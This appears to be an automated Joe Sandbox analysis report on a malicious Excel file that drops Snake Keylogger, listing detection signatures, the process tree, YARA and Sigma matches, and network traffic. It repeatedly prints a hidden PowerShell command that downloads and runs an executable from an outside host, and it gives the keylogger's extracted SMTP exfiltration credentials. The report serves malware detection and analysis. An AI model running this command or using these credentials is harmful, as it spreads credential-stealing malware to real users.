Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7qsPAygCOx.xlsx

Overview

General Information

Sample name:7qsPAygCOx.xlsx
renamed because original name is a hash value
Original sample name:b416b3cd07533aa1e3f322bbf904be65df03dcf08507ef9a683271a3c4848025.xlsx
Analysis ID:1562381
MD5:9bf51f7bdf35911324a4fbb9235090f7
SHA1:d1abcb2b543a4c0f308dade69d1be6a96f356a3b
SHA256:b416b3cd07533aa1e3f322bbf904be65df03dcf08507ef9a683271a3c4848025
Tags:cia-tfxlsxuser-JAMESWT_MHT
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected Snake Keylogger
.NET source code contains potential unpacker
Bypasses PowerShell execution policy
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with hexadecimal encoded strings
Document exploit detected (process start blacklist hit)
Drops VBS files to the startup folder
Drops large PE files
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3420 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • powershell.exe (PID: 3532 cmdline: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile; MD5: A575A7610E5F003CC36DF39E07C4BA7D)
      • tmp7752.exe (PID: 3756 cmdline: "C:\Users\user\AppData\Local\Temp\tmp7752.exe" MD5: 2ED7362E959D42385D4E6D231A6840DD)
  • wscript.exe (PID: 3876 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" MD5: 045451FA238A75305CC26AC982472367)
    • svcost.exe (PID: 3928 cmdline: "C:\Users\user\AppData\Roaming\svcost.exe" MD5: A210D6F3E1093395552CE55FA063E011)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "sendpcamill@juguly.shop", "Password": "rEBS93U9rKLG", "Host": "juguly.shop", "Port": "587", "Version": "5.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x14ad5:$a1: get_encryptedPassword
      • 0x14dc1:$a2: get_encryptedUsername
      • 0x148e1:$a3: get_timePasswordChanged
      • 0x149dc:$a4: get_passwordField
      • 0x14aeb:$a5: set_encryptedPassword
      • 0x16168:$a7: get_logins
      • 0x160cb:$a10: KeyLoggerEventArgs
      • 0x15d36:$a11: KeyLoggerEventArgsEventHandler
      00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
      • 0x18498:$x1: $%SMTPDV$
      • 0x184fe:$x2: $#TheHashHere%&
      • 0x19b0f:$x3: %FTPDV$
      • 0x19c03:$x4: $%TelegramDv$
      • 0x15d36:$x5: KeyLoggerEventArgs
      • 0x160cb:$x5: KeyLoggerEventArgs
      • 0x19b33:$m2: Clipboard Logs ID
      • 0x19d53:$m2: Screenshot Logs ID
      • 0x19e63:$m2: keystroke Logs ID
      • 0x1a13d:$m3: SnakePW
      • 0x19d2b:$m4: \SnakeKeylogger\
      00000005.00000002.492354767.0000000004A80000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Click to see the 22 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.tmp7752.exe.4a80000.10.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          5.2.tmp7752.exe.3825570.5.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            5.2.tmp7752.exe.3825570.5.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
              5.2.tmp7752.exe.3825570.5.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x12c85:$a1: get_encryptedPassword
              • 0x12f71:$a2: get_encryptedUsername
              • 0x12a91:$a3: get_timePasswordChanged
              • 0x12b8c:$a4: get_passwordField
              • 0x12c9b:$a5: set_encryptedPassword
              • 0x14318:$a7: get_logins
              • 0x1427b:$a10: KeyLoggerEventArgs
              • 0x13ee6:$a11: KeyLoggerEventArgsEventHandler
              5.2.tmp7752.exe.3825570.5.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x1a6af:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x198e1:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x19d14:$a4: \Orbitum\User Data\Default\Login Data
              • 0x1ad53:$a5: \Kometa\User Data\Default\Login Data
              Click to see the 9 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Suspicious Microsoft Office Child Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3420, ParentProcessName: EXCEL.EXE, ProcessCommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, ProcessId: 3532, ProcessName: powershell.exe
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , ProcessId: 3876, ProcessName: wscript.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3420, ParentProcessName: EXCEL.EXE, ProcessCommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, ProcessId: 3532, ProcessName: powershell.exe
              Sigma detected: PowerShell Web Download
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3420, ParentProcessName: EXCEL.EXE, ProcessCommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, ProcessId: 3532, ProcessName: powershell.exe
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3420, ParentProcessName: EXCEL.EXE, ProcessCommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, ProcessId: 3532, ProcessName: powershell.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , ProcessId: 3876, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3420, ParentProcessName: EXCEL.EXE, ProcessCommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, ProcessId: 3532, ProcessName: powershell.exe
              Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3532, TargetFilename: C:\Users\user\AppData\Local\Temp\lvmpns14.xqn.ps1

              Data Obfuscation

              barindex
              Sigma detected: Drops script at startup location
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\tmp7752.exe, ProcessId: 3756, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: 7qsPAygCOx.xlsxAvira: detected
              Source: 7qsPAygCOx.xlsxAvira: detected
              Antivirus detection for URL or domain
              Source: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exeAvira URL Cloud: Label: malware
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Roaming\svcost.exeAvira: detection malicious, Label: HEUR/AGEN.1310409
              Found malware configuration
              Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sendpcamill@juguly.shop", "Password": "rEBS93U9rKLG", "Host": "juguly.shop", "Port": "587", "Version": "5.1"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeReversingLabs: Detection: 68%
              Multi AV Scanner detection for submitted file
              Source: 7qsPAygCOx.xlsxReversingLabs: Detection: 47%
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\svcost.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: 7qsPAygCOx.xlsxJoe Sandbox ML: detected
              Source: unknownHTTPS traffic detected: 104.21.1.182:443 -> 192.168.2.22:49163 version: TLS 1.0
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: C:\Users\user\AppData\Local\Temp\tmp7752.PDBP source: tmp7752.exe, 00000005.00000002.488510973.0000000000447000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Roaming\svcost.PDBO source: svcost.exe, 00000008.00000002.515173603.0000000000418000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: tmp7752.exe, 00000005.00000002.488982546.0000000000E40000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000395B000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.000000000266B000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbles\;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERNAME=Al$$ source: svcost.exe, 00000008.00000002.520082230.0000000005150000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: tmp7752.exe, 00000005.00000002.488982546.0000000000E40000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000395B000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.000000000266B000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: :\Windows\mscorlib.pdbpdblib.pdb source: tmp7752.exe, 00000005.00000002.488544480.000000000054F000.00000004.00000020.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515284150.0000000000540000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: i0C:\Windows\mscorlib.pdbP source: tmp7752.exe, 00000005.00000002.488510973.0000000000447000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: i0C:\Windows\mscorlib.pdbO source: svcost.exe, 00000008.00000002.515173603.0000000000418000.00000004.00000010.00020000.00000000.sdmp
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior

              Software Vulnerabilities

              barindex
              Document exploit detected (process start blacklist hit)
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 4x nop then jmp 00460D90h5_2_00460CD8
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 4x nop then jmp 00640944h5_2_006408A8
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 4x nop then jmp 00640944h5_2_00640AFE
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 4x nop then jmp 00640944h5_2_00640C56
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 4x nop then jmp 00AAB60Bh5_2_00AAB401
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 4x nop then jmp 00AAB60Bh5_2_00AAB410
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h5_2_04A7DB88
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 4x nop then jmp 00690944h8_2_006908A8
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 4x nop then jmp 00690944h8_2_00690898
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 4x nop then jmp 00690944h8_2_00690C56
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 4x nop then jmp 0069F5D0h8_2_0069F518
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 4x nop then jmp 0212B60Bh8_2_0212B410
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 4x nop then jmp 0212B60Bh8_2_0212B401
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h8_2_044BDB88
              Source: global trafficDNS query: name: cia.tf
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
